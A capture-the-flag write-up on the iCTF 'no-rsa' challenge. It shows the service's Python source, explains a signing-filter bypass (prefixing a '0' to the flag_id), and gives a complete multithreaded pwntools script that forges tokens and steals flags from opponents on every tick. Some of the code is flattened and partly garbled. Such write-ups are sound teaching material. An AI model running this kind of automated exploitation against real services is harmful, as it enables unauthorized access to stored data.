The no-rsa challenge was pretty simple.
When you connect you get the following menu
Hi! Welcome to our note storage system. It's based on RSA!
What do you want to do?
1. Write a Note -> Type W
2. Reading a specific note? -> Type R
3. Request for a signature of your integer? -> Type S
You needed to get an opponent to sign their flag_id (given by the iCTF api) so you can access their flag note
the program claims to refuse to sign things that start with 1111, which is all of the flag_id's here's how it does it
if len(number) >= 3 and number[0:3] == '1111': print 'We told you! we will not sign integers starting with four consecutive ones!'we can get around it by sending 01111... as the start of our number
The real trick to this CTF was making sure you exploited everyone's challenge every time it 'ticks' (generally 5 minutes)
it wasn't a super fast connection and there were a lot of competitors. So I wrote a pretty fantastic multithreaded thing that worked rather well
Here is the full source code of the challenge
#!/usr/bin/python import os import sys import json import random import string from Crypto.PublicKey import RSA N = None P = None Q = None PHI = None E = 65537 D = None FILE_DIR = 'files' def service(): print "Hi! Welcome to our note storage system. It's based on RSA!" print 'What do you want to do?' print '1. Write a Note -> Type W' print '2. Reading a specific note? -> Type R' print '3. Request for a signature of your integer? -> Type S' sys.stdout.flush() cmd = raw_input() if cmd == 'W': write_note() elif cmd == 'R': read_note() elif cmd == 'S': sign() def generate_random_note_id(): return '1111' + ''.join((random.choice(string.digits) for x in range(36))) def sign(): global E global N print 'Here is our public key (you need them in order to verify the signature): N E' print N, E print 'Please type: number!' print "We don't sign integers starting with four consecutive ones!" sys.stdout.flush() number = raw_input() if len(number) >= 3 and number[0:3] == '1111': print 'We told you! we will not sign integers starting with four consecutive ones!' sys.stdout.flush() else: if number.isdigit(): s = dec(int(number)) print 'The signature: ' print s sys.stdout.flush() return s print 'Not a number!' sys.stdout.flush() def read_note(): print 'Please type: note_id token' sys.stdout.flush() note_id, token = raw_input().split(' ', 2) try: with open('{}/{}'.format(FILE_DIR, note_id)) as f: json_data = json.load(f) real_token = json_data['token'] content = json_data['content'] except Exception as e: print 'wrong note_id!' sys.stdout.flush() return if token != real_token: print 'Wrong token!' sys.stdout.flush() return print 'Note content: ', content sys.stdout.flush() def write_note(): while True: note_id = generate_random_note_id() if not os.path.isfile(note_id): break print 'Please type: content (in just one line)' sys.stdout.flush() content = raw_input() token = str(dec(int(note_id))) with open('{}/{}'.format(FILE_DIR, note_id), 'wx') as f: json.dump({'token': token, 'content': content}, f) print 'Your note is safe with us! You can retrieve it later by these information: note_id token' print note_id, token sys.stdout.flush() def enc(x): return modpow(x, E, N) def dec(c): global D return modpow(c, D, N) def modpow(a, b, m): """ a^b mod m used for rsa """ result = 1 a = a % m while b > 0: if b % 2 == 0: a = a * a % m b = b / 2 else: result = result * a % m b = b - 1 return result def initialize_rsa_credentials(): global PHI global E global D global N global Q global P if os.path.isfile('rsa.txt'): with open('rsa.txt') as rsa_data: rsa_credentials = json.load(rsa_data) N = rsa_credentials['N'] P = rsa_credentials['P'] Q = rsa_credentials['Q'] PHI = rsa_credentials['PHI'] E = rsa_credentials['E'] D = rsa_credentials['D'] return key = RSA.generate(1024, e=E) N = getattr(key.key, 'n') P = getattr(key.key, 'p') Q = getattr(key.key, 'q') D = getattr(key.key, 'd') PHI = (P - 1) * (Q - 1) with open('rsa.txt', 'w') as file: json.dump({'N': N, 'P': P, 'Q': Q, 'E': E, 'D': D, 'PHI': PHI}, file) def make_file_dir(): if not os.path.isdir(FILE_DIR): os.makedirs(FILE_DIR) if __name__ == '__main__': initialize_rsa_credentials() make_file_dir() service()And here is my solution
#!/usr/bin/env python # pwn all the no-rsa challs for iCTF # paste_bin K17 import sys from ictf import iCTF from pwn import * from multiprocessing import Pool import multiprocessing from multiprocessing.dummy import Pool as ThreadPool from functools import partial i = iCTF() t = i.login('[REDACTED]', '[REDACTED]') print "[*] logged in" # context.log_level = 1 def attack_target(target): context.log_level = 1000 try: conn = remote(target["hostname"], target["port"]) conn.recvuntil("Type S") conn.sendline("S") # we want to sign their id conn.recvuntil("consecutive ones!") conn.sendline("0" + target["flag_id"]) conn.recvuntil("The signature: \n") signature = conn.recvuntil("\n") # print "[!] Signature = " + signature conn.close() conn = remote(target["hostname"], target["port"]) conn.recvuntil("Type S") conn.sendline("R") # we now want to read their flag file conn.recvuntil("Please type: note_id token\n") # send their flag_id and the signature conn.sendline(target["flag_id"] + " " + signature) conn.recvuntil("Note content: ") flag = conn.recvuntil("\n").rstrip() # print "[*] Flag = '" + flag + "'" conn.close() return str(flag) except: # print "[*] No flag from " + target["hostname"] pass return None def abortable_worker(func, *args, **kwargs): timeout = kwargs.get('timeout', None) p = ThreadPool(1) res = p.apply_async(func, args=args) try: out = res.get(timeout) # Wait timeout seconds for func to complete. return out except multiprocessing.TimeoutError: # print("Aborting due to timeout") p.terminate() return None def get_next_tick(): tick = 10 try: tick = int(t.get_tick_info()["approximate_seconds_left"]) except: pass return tick def get_targets(chall): try: targets = t.get_targets(chall)["targets"] return targets except: print "Failed to get targets" sleep(1) return get_targets(chall) def wait(): context.log_level = 3 next_tick = get_next_tick() with log.progress('Waiting:') as p: while next_tick > 2: next_tick = get_next_tick() p.status(str(next_tick)) sleep(1) context.log_level = 100 def submit_flags(flags): print "Submitting FLAGS" good = False while not good: try: return t.submit_flag(flags) good = True sleep(1) except: print "Submittion failed, trying again" # print flags sleep(1) pass def attack(timeout=1): next_tick = get_next_tick() targets = get_targets("no-rsa") # print "there are this many targets" # print len(targets) pool = Pool(processes=len(targets)) abortable_func = partial(abortable_worker, attack_target, timeout=timeout) flags = [x for x in, targets) if x != None] pool.close() pool.join() print "Pwned " + str(len(flags)) return flags def flags_the_same(flags): if len(flags) == 0: return True template = flags[0] for flag in flags: if flag != template: print flag print template return False return True while True: next_tick = get_next_tick() # make sure we are in the tick sleep(4) print "~~HACKING~~" print "Next tick is in " + str(next_tick) flags = attack(timeout=4) responses = submit_flags(flags) print "CORRECT: " + str(len([x for x in responses if x == 'correct'])) print responses while 'correct' in responses: print "Going Again" flags = attack(timeout=1) responses = submit_flags(flags) print "CORRECT: " + str(len([x for x in responses if x == 'correct'])) print "no more corrects" # blitz # if it's a short timer then smash the ones we can do quickly print "BLITZ" while get_next_tick() < 60: flags = attack(timeout=1) responses = submit_flags(flags) print "CORRECT: " + str(len([x for x in responses if x == 'correct'])) print "Tick:" + str(get_next_tick()) # sleep(1) while 'correct' in responses or get_next_tick() > 60: print 'doing a slow batch' next_tick = get_next_tick() print "Next batch in " + str(next_tick) flags = attack(timeout=5 + next_tick/10) responses = submit_flags(flags) print "CORRECT: " + str(len([x for x in responses if x == 'correct'])) print responses print "no more corrects" wait()